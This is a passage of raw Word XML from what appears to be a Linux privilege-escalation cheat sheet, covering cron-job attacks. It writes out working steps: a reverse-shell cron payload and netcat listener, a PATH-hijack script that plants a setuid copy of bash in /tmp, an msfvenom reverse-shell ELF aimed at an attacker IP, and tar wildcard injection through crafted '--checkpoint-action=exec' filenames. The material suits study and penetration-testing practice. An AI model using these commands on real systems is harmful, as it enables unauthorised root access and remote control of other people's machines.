                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>NUMBER</w:t>
            </w:r>
            <w:r w:rsidRPr="006B2D1A">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006B2D1A">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>0&gt;&amp;1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27E8BA2C" w14:textId="77777777" w:rsidR="006A68EF" w:rsidRDefault="006A68EF" w:rsidP="00604F8E">
            <w:r>
              <w:t>Then, if this cronjob is running every minute or so, simply set up a reverse listener:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="464CB3BA" w14:textId="7940387D" w:rsidR="006A68EF" w:rsidRPr="00E23A49" w:rsidRDefault="006A68EF" w:rsidP="00604F8E">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="006A68EF">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">nc </w:t>
            </w:r>
            <w:r w:rsidRPr="006A68EF">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-lnvp </w:t>
            </w:r>
            <w:r w:rsidRPr="006A68EF">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>PORTNUMBER</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C84DDE" w14:paraId="101A3A55" w14:textId="77777777" w:rsidTr="00604F8E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6469C60E" w14:textId="311B40DF" w:rsidR="00C84DDE" w:rsidRDefault="00C84DDE" w:rsidP="00604F8E">
            <w:r>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2CDFC7C9" w14:textId="77C7AC9C" w:rsidR="00DB1C6D" w:rsidRDefault="00DB1C6D" w:rsidP="00604F8E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Cron Jobs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2568AAE6" w14:textId="21F41BEB" w:rsidR="00C84DDE" w:rsidRDefault="000B4B60" w:rsidP="00604F8E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="000B4B60">
              <w:t>PATH</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7789CED5" w14:textId="77777777" w:rsidR="006B2D1A" w:rsidRDefault="006B2D1A" w:rsidP="00604F8E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="48DFF5C1" w14:textId="050A058F" w:rsidR="006B2D1A" w:rsidRPr="000B4B60" w:rsidRDefault="006B2D1A" w:rsidP="00604F8E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r w:rsidRPr="006B2D1A">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>If there isn’t any</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> cron jobs</w:t>
            </w:r>
            <w:r w:rsidRPr="006B2D1A">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> set</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> in crontab</w:t>
            </w:r>
            <w:r w:rsidRPr="006B2D1A">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>, this technique won’t work.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w: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7491A2A1" w14:textId="77777777" w:rsidR="00C84DDE" w:rsidRDefault="000B4B60" w:rsidP="00604F8E">
            <w:r>
              <w:t>Examine the crontab:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1187D92C" w14:textId="77777777" w:rsidR="000B4B60" w:rsidRDefault="000B4B60" w:rsidP="00604F8E">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="000B4B60">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">cat </w:t>
            </w:r>
            <w:r w:rsidRPr="000B4B60">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/etc/crontab</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DD51AFD" w14:textId="77777777" w:rsidR="000B4B60" w:rsidRPr="000B4B60" w:rsidRDefault="000B4B60" w:rsidP="00604F8E">
            <w:r w:rsidRPr="000B4B60">
              <w:t>If you see the environment variable PATH, it probably shows something like:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0698FA53" w14:textId="77777777" w:rsidR="000B4B60" w:rsidRPr="000B4B60" w:rsidRDefault="000B4B60" w:rsidP="000B4B60">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B4B60">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>SHELL=/bin/sh</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D4AB9A8" w14:textId="0B99A3CF" w:rsidR="000B4B60" w:rsidRPr="000B4B60" w:rsidRDefault="000B4B60" w:rsidP="000B4B60">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000B4B60">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>PATH=/home/</w:t>
            </w:r>
            <w:r w:rsidR="00CE610E" w:rsidRPr="00CE610E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>USER</w:t>
            </w:r>
            <w:r w:rsidRPr="000B4B60">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="781B10F1" w14:textId="4094E678" w:rsidR="000B4B60" w:rsidRDefault="000B4B60" w:rsidP="000B4B60">
            <w:r>
              <w:t>You can see the first location of this variable is /home/</w:t>
            </w:r>
            <w:r w:rsidR="00CE610E" w:rsidRPr="00CE610E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>USER</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, it won’t always </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>be</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> but this is useful as we can create a malicious file in this directory</w:t>
            </w:r>
            <w:r w:rsidR="00CE610E">
              <w:t xml:space="preserve"> (using vim or another editor)</w:t>
            </w:r>
            <w:r>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2733EBBF" w14:textId="3DCF6C9F" w:rsidR="000B4B60" w:rsidRPr="006B2D1A" w:rsidRDefault="000B4B60" w:rsidP="000B4B60">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B2D1A">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>#!/bin/bash</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DE7C4E6" w14:textId="77777777" w:rsidR="000B4B60" w:rsidRPr="006B2D1A" w:rsidRDefault="000B4B60" w:rsidP="000B4B60">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B2D1A">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cp</w:t>
            </w:r>
            <w:r w:rsidRPr="006B2D1A">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006B2D1A">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>/bin/bash /tmp/rootbash</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39015288" w14:textId="77777777" w:rsidR="000B4B60" w:rsidRDefault="000B4B60" w:rsidP="000B4B60">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006B2D1A">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>chmod +xs /tmp/rootbash</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33A1DFD9" w14:textId="773D2588" w:rsidR="006B2D1A" w:rsidRDefault="006B2D1A" w:rsidP="000B4B60">
            <w:r>
              <w:t>Call this file the name of one of the crontab files (if there is one)</w:t>
            </w:r>
            <w:r w:rsidR="00CE610E">
              <w:t>, and change the permissions so that it can be executed:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2520352B" w14:textId="77777777" w:rsidR="00CE610E" w:rsidRDefault="00CE610E" w:rsidP="000B4B60">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00CE610E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">chmod </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE610E">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">+x </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE610E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/home/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>USER</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE610E">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/FILENAME.EXTENSION</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43A81090" w14:textId="77777777" w:rsidR="00F97169" w:rsidRPr="00F97169" w:rsidRDefault="00F97169" w:rsidP="000B4B60">
            <w:r w:rsidRPr="00F97169">
              <w:t>Check the location of where the /bin/bash should be copied to, in this example, its:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="295E5588" w14:textId="77777777" w:rsidR="00F97169" w:rsidRPr="00F97169" w:rsidRDefault="00F97169" w:rsidP="000B4B60">
            <w:r w:rsidRPr="00F97169">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F97169">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">cd </w:t>
            </w:r>
            <w:r w:rsidRPr="00F97169">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/tmp/rootbash</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1840A15A" w14:textId="77777777" w:rsidR="00F97169" w:rsidRDefault="009A5394" w:rsidP="000B4B60">
            <w:r>
              <w:t>From here, simply execute the newly copied /bin/bash command:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AEFE467" w14:textId="17B8AA76" w:rsidR="009A5394" w:rsidRPr="006B2D1A" w:rsidRDefault="009A5394" w:rsidP="000B4B60">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009A5394">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">./rootbash </w:t>
            </w:r>
            <w:r w:rsidRPr="009A5394">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-p</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB1C6D" w14:paraId="22E09B64" w14:textId="77777777" w:rsidTr="00604F8E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5F0326A5" w14:textId="1FB7D241" w:rsidR="00DB1C6D" w:rsidRDefault="00DB1C6D" w:rsidP="00604F8E">
            <w:r>
              <w:t>95.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2392" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="29C20471" w14:textId="77777777" w:rsidR="00DB1C6D" w:rsidRDefault="00DB1C6D" w:rsidP="00604F8E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Cron Jobs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47E7B845" w14:textId="7FABAB70" w:rsidR="00075A15" w:rsidRPr="00075A15" w:rsidRDefault="00075A15" w:rsidP="00604F8E">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00075A15">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>tar</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16EE7F9B" w14:textId="10632DFB" w:rsidR="00DB1C6D" w:rsidRDefault="00DB1C6D" w:rsidP="00604F8E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Wildcards</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8024" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F5BD3EF" w14:textId="77777777" w:rsidR="00DB1C6D" w:rsidRDefault="00DB1C6D" w:rsidP="00604F8E">
            <w:r>
              <w:t xml:space="preserve">Sometimes you may come across another script being called within the crontab, use the </w:t>
            </w:r>
            <w:r w:rsidRPr="00DB1C6D">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">cat </w:t>
            </w:r>
            <w:r>
              <w:t>command to see what this script is doing.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54810B13" w14:textId="7B8DEF30" w:rsidR="00DB1C6D" w:rsidRDefault="00DB1C6D" w:rsidP="00604F8E">
            <w:r>
              <w:t>If you see the script running</w:t>
            </w:r>
            <w:r w:rsidR="0068131A">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="0068131A" w:rsidRPr="0068131A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>tar</w:t>
            </w:r>
            <w:r w:rsidRPr="0068131A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>with a wildcard (*) in a directory we have access to, such as the user’s home directory, we’re in luck.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A43F03A" w14:textId="1ED38280" w:rsidR="00DB1C6D" w:rsidRDefault="00450D19" w:rsidP="00604F8E">
            <w:r>
              <w:t>Next, use msfvenom</w:t>
            </w:r>
            <w:r w:rsidR="00B87A4A">
              <w:t xml:space="preserve"> on your machine</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to create an ELF binary reverse shell script:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="762C1E71" w14:textId="77777777" w:rsidR="00450D19" w:rsidRDefault="00450D19" w:rsidP="00604F8E">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00450D19">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">msfvenom </w:t>
            </w:r>
            <w:r w:rsidRPr="00450D19">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-p </w:t>
            </w:r>
            <w:r w:rsidRPr="00450D19">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">linux/x64/shell_reverse_tcp </w:t>
            </w:r>
            <w:r w:rsidRPr="00450D19">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>LHOST=</w:t>
            </w:r>
            <w:r w:rsidR="00B87A4A" w:rsidRPr="00B87A4A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>OUR.IP.ADD.RESS</w:t>
            </w:r>
            <w:r w:rsidRPr="00B87A4A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00B87A4A">
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00B87A4A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>LPORT=</w:t>
            </w:r>
            <w:r w:rsidRPr="00B87A4A">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>4444</w:t>
            </w:r>
            <w:r w:rsidRPr="00450D19">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00B87A4A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-f </w:t>
            </w:r>
            <w:r w:rsidRPr="00B87A4A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">elf </w:t>
            </w:r>
            <w:r w:rsidRPr="00B87A4A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-o </w:t>
            </w:r>
            <w:r w:rsidRPr="00B87A4A">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t>shell.elf</w:t>
            </w:r>
            <w:r w:rsidR="00B87A4A">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B87A4A">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00B87A4A" w:rsidRPr="00B87A4A">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="806000" w:themeColor="accent4" w:themeShade="80"/>
              </w:rPr>
              <w:tab/>
              <w:t>(All one command)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76389279" w14:textId="3DF74C5D" w:rsidR="00B87A4A" w:rsidRDefault="00B87A4A" w:rsidP="00604F8E">
            <w:r w:rsidRPr="00B87A4A">
              <w:t xml:space="preserve">This will </w:t>
            </w:r>
            <w:r>
              <w:t>save the file in your working directory on you attack machine, so now we need to upload the file to the victim machine using: a web page upload functionality (see above); SimpleHTTPServer and wget (see above); or scp</w:t>
            </w:r>
            <w:r w:rsidR="00075A15">
              <w:t xml:space="preserve"> via ssh</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (see above).</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CF74E4C" w14:textId="7B1F01BA" w:rsidR="00075A15" w:rsidRPr="00075A15" w:rsidRDefault="00075A15" w:rsidP="00604F8E">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Change </w:t>
            </w:r>
            <w:r w:rsidR="00A107E7">
              <w:t>the permissions of the file so it can be executed and move it:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DB63FB2" w14:textId="6F9233EE" w:rsidR="00075A15" w:rsidRDefault="00075A15" w:rsidP="00604F8E">
            <w:pPr>
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00075A15">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">chmod </w:t>
            </w:r>
            <w:r w:rsidRPr="00075A15">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">+x </w:t>
            </w:r>
            <w:r w:rsidRPr="00075A15">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t>shell.elf</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02D17291" w14:textId="605B39EB" w:rsidR="00075A15" w:rsidRDefault="00A107E7" w:rsidP="00604F8E">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A107E7">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">mv </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t xml:space="preserve">shell.elf </w:t>
            </w:r>
            <w:r w:rsidRPr="00A107E7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>LOCATION/WHERE/TAR/COMMAND/EXECUTES</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26C9D31A" w14:textId="5739A46E" w:rsidR="00A107E7" w:rsidRPr="00A107E7" w:rsidRDefault="00A107E7" w:rsidP="00604F8E">
            <w:pPr>
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
                <w14:textFill>
                  <w14:solidFill>
                    <w14:srgbClr w14:val="00B050">
                      <w14:lumMod w14:val="50000"/>
                    </w14:srgbClr>
                  </w14:solidFill>
                </w14:textFill>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A107E7">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cd</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A107E7">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>LOCATION/WHERE/TAR/COMMAND/EXECUTES</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D5EF56F" w14:textId="77777777" w:rsidR="00075A15" w:rsidRDefault="00075A15" w:rsidP="00604F8E">
            <w:r>
              <w:t>Next, create</w:t>
            </w:r>
            <w:r w:rsidR="0068131A">
              <w:t xml:space="preserve"> two new files in the directory that the </w:t>
            </w:r>
            <w:r w:rsidR="0068131A" w:rsidRPr="0068131A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">tar </w:t>
            </w:r>
            <w:r w:rsidR="0068131A">
              <w:t>command is running in:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77D58F6F" w14:textId="77777777" w:rsidR="0068131A" w:rsidRPr="0068131A" w:rsidRDefault="0068131A" w:rsidP="0068131A">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0068131A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">touch </w:t>
            </w:r>
            <w:r w:rsidRPr="0068131A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/home/user/</w:t>
            </w:r>
            <w:r w:rsidRPr="0068131A">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>--checkpoint=1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43FB8344" w14:textId="77777777" w:rsidR="0068131A" w:rsidRDefault="0068131A" w:rsidP="0068131A">
            <w:pPr>
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0068131A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">touch </w:t>
            </w:r>
            <w:r w:rsidRPr="0068131A">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/home/user/</w:t>
            </w:r>
            <w:r w:rsidRPr="0068131A">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>--checkpoint-action=exec=</w:t>
            </w:r>
            <w:r w:rsidRPr="0068131A">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t>shell.elf</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="470E19E2" w14:textId="77777777" w:rsidR="0068131A" w:rsidRDefault="0068131A" w:rsidP="0068131A">
            <w:r w:rsidRPr="0068131A">
              <w:t xml:space="preserve">When the </w:t>
            </w:r>
            <w:r w:rsidRPr="0068131A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">tar </w:t>
            </w:r>
            <w:r w:rsidRPr="0068131A">
              <w:t xml:space="preserve">command in the cron job runs, the wildcard (*) will expand to include these files. Since their filenames are valid </w:t>
            </w:r>
            <w:r w:rsidRPr="0068131A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">tar </w:t>
            </w:r>
            <w:r>
              <w:t>CLI commands</w:t>
            </w:r>
            <w:r w:rsidRPr="0068131A">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="0068131A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">tar </w:t>
            </w:r>
            <w:r w:rsidRPr="0068131A">
              <w:t>will recognize them as such and treat them as command line options rather than filenames</w:t>
            </w:r>
            <w:r>
              <w:t>!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56A213DB" w14:textId="6D253278" w:rsidR="0068131A" w:rsidRPr="00B87A4A" w:rsidRDefault="0068131A" w:rsidP="0068131A"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C84DDE" w14:paraId="4FBE7AF5" w14:textId="77777777" w:rsidTr="00604F8E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
